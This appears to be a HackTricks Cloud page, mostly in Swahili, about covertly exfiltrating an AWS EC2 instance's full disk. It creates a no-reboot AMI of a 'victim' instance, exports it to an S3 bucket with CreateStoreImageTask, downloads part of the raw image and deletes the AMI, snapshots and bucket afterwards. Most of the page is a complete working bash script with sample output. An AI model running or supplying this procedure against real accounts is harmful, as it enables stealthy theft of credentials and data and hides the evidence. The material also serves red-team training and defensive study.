AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

Tumia vibaya EC2 AMI export-to-S3 ku-exfiltrate diski nzima ya instance ya EC2 kama single raw image iliyohifadhiwa kwenye S3, kisha ui-download nje ya out-of-band. Hii inazuia kushiriki snapshot na inatengeneza object moja kwa kila AMI.

Mahitaji

EC2: ec2:CreateImage, ec2:CreateStoreImageTask, ec2:DescribeStoreImageTasks kwenye instance/AMI lengwa
S3 (same Region): s3:PutObject, s3:GetObject, s3:ListBucket, s3:AbortMultipartUpload, s3:PutObjectTagging, s3:GetBucketLocation
KMS decrypt kwenye key inayolinda AMI snapshots (ikiwa EBS default encryption imewezeshwa)
Sera ya S3 bucket inayomuamini vmie.amazonaws.com service principal (tazama hapa chini)

Athari

Upataji kamili wa offline wa diski ya root ya instance kwenye S3 bila kushiriki snapshots au kunakili kati ya accounts.
Inaruhusu stealth forensics juu ya credentials, configuration, na filesystem contents kutoka kwa exported raw image.

Jinsi ya Exfiltrate via AMI Store-to-S3

Vidokezo:
S3 bucket lazima iwe katika Region ile ile kama AMI.
Katika us-east-1, create-bucket haipaswi kujumuisha --create-bucket-configuration.
--no-reboot huunda crash-consistent image bila kusimamisha instance (stealthier lakini isiyo na consistency kamili).

Amri hatua kwa hatua

```bash # Vars REGION=us-east-1 INSTANCE_ID= BUCKET=exfil-ami-$(date +%s)-$RANDOM

1) Create S3 bucket (same Region)

if [ “$REGION” = “us-east-1” ]; then aws s3api create-bucket –bucket “$BUCKET” –region “$REGION” else aws s3api create-bucket –bucket “$BUCKET” –create-bucket-configuration LocationConstraint=$REGION –region “$REGION” fi

2) (Recommended) Bucket policy to allow VMIE service to write the object

ACCOUNT_ID=$(aws sts get-caller-identity –query Account –output text) cat > /tmp/bucket-policy.json <<POL { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “AllowVMIEPut”, “Effect”: “Allow”, “Principal”: {“Service”: “vmie.amazonaws.com”}, “Action”: [ “s3:PutObject”, “s3:AbortMultipartUpload”, “s3:ListBucket”, “s3:GetBucketLocation”, “s3:GetObject”, “s3:PutObjectTagging” ], “Resource”: [ “arn:aws:s3:::$BUCKET”, “arn:aws:s3:::$BUCKET/” ], “Condition”: { “StringEquals”: {“aws:SourceAccount”: “$ACCOUNT_ID”}, “ArnLike”: {“aws:SourceArn”: “arn:aws:ec2:$REGION:$ACCOUNT_ID:image/ami-”} } } ] } POL aws s3api put-bucket-policy –bucket “$BUCKET” –policy file:///tmp/bucket-policy.json

3) Create an AMI of the victim (stealthy: do not reboot)

AMI_ID=$(aws ec2 create-image –instance-id “$INSTANCE_ID” –name exfil-$(date +%s) –no-reboot –region “$REGION” –query ImageId –output text)

4) Wait until the AMI is available

aws ec2 wait image-available –image-ids “$AMI_ID” –region “$REGION”

5) Store the AMI to S3 as a single object (raw disk image)

OBJKEY=$(aws ec2 create-store-image-task –image-id “$AMI_ID” –bucket “$BUCKET” –region “$REGION” –query ObjectKey –output text)

echo “Object in S3: s3://$BUCKET/$OBJKEY”

6) Poll the task until it completes

until [ “$(aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text)“ = “Completed” ]; do aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text sleep 10 done

7) Prove access to the exported image (download first 1MiB)

aws s3api head-object –bucket “$BUCKET” –key “$OBJKEY” –region “$REGION” aws s3api get-object –bucket “$BUCKET” –key “$OBJKEY” –range bytes=0-1048575 /tmp/ami.bin –region “$REGION” ls -l /tmp/ami.bin

8) Cleanup (deregister AMI, delete snapshots, object & bucket)

aws ec2 deregister-image –image-id “$AMI_ID” –region “$REGION” for S in $(aws ec2 describe-images –image-ids “$AMI_ID” –region “$REGION”
–query Images[0].BlockDeviceMappings[].Ebs.SnapshotId –output text); do aws ec2 delete-snapshot –snapshot-id “$S” –region “$REGION” done aws s3 rm “s3://$BUCKET/$OBJKEY” –region “$REGION” aws s3 rb “s3://$BUCKET” –force –region “$REGION”

</details>

## Mfano wa Ushahidi

- `describe-store-image-tasks` mabadiliko:
```text
InProgress
Completed

S3 object metadata (mfano):

{
"AcceptRanges": "bytes",
"LastModified": "2025-10-08T01:31:46+00:00",
"ContentLength": 399768709,
"ETag": "\"c84d216455b3625866a58edf294168fd-24\"",
"ContentType": "application/octet-stream",
"ServerSideEncryption": "AES256",
"Metadata": {
"ami-name": "exfil-1759887010",
"ami-owner-account": "<account-id>",
"ami-store-date": "2025-10-08T01:31:45Z"
}
}

Kupakua kwa sehemu kunathibitisha ufikiaji wa kitu:

ls -l /tmp/ami.bin
# -rw-r--r--  1 user  wheel  1048576 Oct  8 03:32 /tmp/ami.bin

Idhini za IAM Zinazohitajika

EC2: CreateImage, CreateStoreImageTask, DescribeStoreImageTasks
S3 (kwa bucket ya export): PutObject, GetObject, ListBucket, AbortMultipartUpload, PutObjectTagging, GetBucketLocation
KMS: Ikiwa AMI snapshots zimefichwa (encrypted), ruhusu decrypt kwa EBS KMS key inayotumika na snapshots

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.